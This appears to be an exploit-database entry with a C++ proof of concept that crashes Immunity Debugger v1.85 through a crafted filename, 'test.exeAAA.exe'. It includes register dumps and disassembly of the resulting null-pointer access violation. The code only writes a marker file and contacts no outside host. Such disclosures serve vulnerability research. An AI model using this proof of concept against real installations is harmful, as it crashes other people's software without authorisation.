Immunity Debugger v1.85 32-bit Memmory Corruption

2012-06-07T00:00:00
ID 1337DAY-ID-18480
Type zdt
Reporter Ayrbyte
Modified 2012-06-07T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ////////////////////////////////////////////////////////////////////////////////
//Title: Immunity Debugger v1.85 32-bit Memmory Corruption
//Author: Ayrbyte
//Link: debugger.immunityinc.com
//Versi: v1.85
//Tested on: Windows 7
//Fb: facebook.com/Ayrbyte
//Greetz To : R31tuz, 3|_^^1x, XerkusR, Clan X-BX, and all CREMY Family
//
//    ??  %%  %% $$$$$        >>  > ::    ;;;;;;;;
//   ?? ?  %% %% $$ $$ ||      >> > ::    ;;    ;;
//  ?????   %%%% $$$$$ ||___    >>> ::::: ;;;;;;;
// ??   ??    %% $$$$  ||  ||     > ::    ;;
//      %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;;
//    ______________>>Ayrbyte<<_______________
//   Gamerz From CREMY | CRazy Experience arMY
////////////////////////////////////////////////////////////////////////////////
//[register]
//EAX 00000000
//ECX 00000000
//EDX 0022DFE0
//EBX 0022DB70 ASCII ".exe"
//ESP 0022C0C4
//EBP 0022D864 ASCII "test.exe"
//ESI 0022DFB8 ASCII "C:\Users\R1d3Rw13c\Desktop\test.exeAAA.exe"
//EDI 0022DFDB ASCII ".exe"
//EIP 777E49F6 ntdll.777E49F6
//
//[diassembly]
//779349D4   test        ecx,3
//779349DA   je          779349F6
//779349DC   mov         al,byte ptr [ecx]
//779349DE   add         ecx,1
//779349E1   test        al,al
//779349E3   je          77934A2B
//779349E5   test        ecx,3
//779349EB   jne         779349DC
//779349ED   add         eax,0
//779349F0   lea         esp,[esp]
//779349F3   lea         esp,[esp]
//779349F6   mov         eax,dword ptr [ecx]; ECX=00000000 ds:[00000000]=??? <--NullPointer
//779349F8   mov         edx,7EFEFEFFh
//779349FD   add         edx,eax
//779349FF   xor         eax,0FFh
//77934A02   xor         eax,edx
//77934A04   add         ecx,4
//77934A07   test        eax,81010100h
//77934A0C   je          779349F6
//77934A0E   mov         eax,dword ptr [ecx-4]
//
//Unhandle exception in ImmunityDebugger.exe (NTDLL.DLL):0xC0000005: Access Violation
//Immunity does not handle the filename test.exeAAA.exe correctly: the "AAA" after ".exe" is also taken as input,
//and at offset 779349f6 (mov eax,dword ptr [ecx]) ecx is 00000000, so ds:[00000000]=??? <--NullPointer;
//this makes the program crash.
////////////////////////////////////////////////////////////////////////////////

#include <cstdio>
#include <iostream>
using namespace std;

// Payload written into the generated file. The bytes are the plain ASCII text
// "CREMY | CRazy Experience arMY" (the original spelled them as hex escapes);
// the trailing NUL is not written because fputs stops at it.
char _isi[] = "CREMY | CRazy Experience arMY";
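int main(){
    // Create "test.exeAAA.exe" in the current directory and write the marker
    // string _isi into it; the resulting file is then loaded in the debugger
    // (see the header comment). Returns 0 on success, 1 if any file operation fails.
    static constexpr const char* kNameFile = "test.exeAAA.exe";

    FILE* out = fopen(kNameFile, "w");
    if (out == nullptr) {
        // The original dereferenced the null FILE* when fopen failed (e.g. a
        // read-only working directory); report the cause and bail out instead.
        perror(kNameFile);
        return 1;
    }

    int rc = 0;
    if (fputs(_isi, out) == EOF) {
        perror("fputs");
        rc = 1;
    }
    // fclose can still fail (buffered data is flushed here), so check it too.
    if (fclose(out) != 0) {
        perror("fclose");
        rc = 1;
    }
    return rc;
}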


